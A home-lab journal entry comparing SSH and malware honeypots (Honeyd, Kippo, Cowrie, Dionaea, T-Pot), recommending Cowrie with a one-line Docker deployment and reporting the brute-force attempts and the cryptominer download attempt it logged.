ArgoBox
ArgoBox Infrastructure & Automation
user@argobox:~/journal/2023-08-17-the-honeypots-that-lie-in-wait
$ cat entry.md

The Honeypots That Lie in Wait

[Thursday, August 17, 2023] MOOD: DISCOVERY Kali
○ NOT REVIEWED

The Honeypots That Lie in Wait

Date: August 17, 2023 Issue: Which honeypot for a home security lab? Research: Honeyd, Kippo, Cowrie, Dionaea Result: Cowrie for SSH, T-Pot for full deployment

The Question

Building the pentesting lab meant building defenses too. Not just firewalls and rules, but something more interesting: honeypots.

A honeypot sits there, looking like a vulnerable system, waiting for someone to poke it. When they do, you learn everything about their techniques.

The question: which honeypot for a home network?

The Contenders

Honeyd

The classic. Simulates entire network topologies. You can make it look like you have 50 machines when you have 5.

Pros: Low resource usage, highly configurable, can simulate multiple OS fingerprints.

Cons: Old (last updated years ago), doesn’t capture payloads well, more about confusion than intelligence gathering.

Verdict: Good for making attackers waste time scanning fake hosts. Less useful for learning their actual techniques.

Kippo

SSH honeypot. Pretends to be a vulnerable SSH server. When attackers brute-force in, they land in a fake filesystem.

Pros: Captures passwords, commands, and downloaded malware.

Cons: Abandoned. Hasn’t been updated since 2015.

Verdict: Skip it. Use Cowrie instead.

Cowrie

Kippo’s successor. SSH and Telnet honeypot with active development.

Pros:

  • Captures brute-force attempts with passwords
  • Logs every command attackers type
  • Downloads any malware they try to install
  • Can proxy connections to real systems for deeper analysis
  • JSON logging for easy SIEM integration

Cons: Only catches SSH/Telnet. Won’t see web attacks or SMB exploits.

Verdict: Perfect for home networks. SSH is the most common attack vector, and Cowrie catches everything.

Dionaea

Malware collection honeypot. Simulates vulnerable services (SMB, HTTP, FTP, MSSQL) to catch exploit payloads.

Pros: Captures actual malware samples. Great for research.

Cons: Higher resource usage. More complex setup. You’re now storing malware on your network (contained, but still).

Verdict: Good if you want to study malware. Overkill for basic home network defense.

The Home Network Recommendation

For a home lab, start with Cowrie.

  1. Most attacks on home networks are SSH brute-force
  2. Low resource usage (runs on a Raspberry Pi)
  3. Easy to deploy via Docker
  4. Logs are gold for learning attacker patterns
docker run -d -p 22:2222 cowrie/cowrie

Move your real SSH to a high port (like 2222), let Cowrie answer on 22. Watch the logs fill up with brute-force attempts within hours.

The Advanced Option: T-Pot

If you want everything, T-Pot bundles multiple honeypots:

  • Cowrie (SSH/Telnet)
  • Dionaea (malware)
  • Honeytrap (service emulation)
  • Suricata (IDS)
  • ELK stack for visualization

It’s a VM image. Deploy it, expose it, watch the attacks roll in.

Warning: T-Pot is noisy. It catches everything. You’ll need time to filter signal from noise.

What I Deployed

Started with Cowrie on a dedicated LXC container. Port 22 forwarded from the WAN.

Within 24 hours:

  • 847 brute-force attempts
  • Top passwords: admin, root, 123456, password
  • One attacker got “in” and tried to download a cryptominer

The cryptominer download was logged and captured. Analyzed it the next day. Basic stuff, but educational.

The Lesson

Honeypots aren’t just security theater. They’re intelligence gathering.

Every attacker who hits the honeypot instead of the real server is:

  1. Wasting their time
  2. Teaching you their techniques
  3. Getting their IP logged for blocking

The home network doesn’t need enterprise-grade deception. It needs one Cowrie instance, answering SSH, collecting passwords, and logging everything.

Set a trap. Learn from what falls in.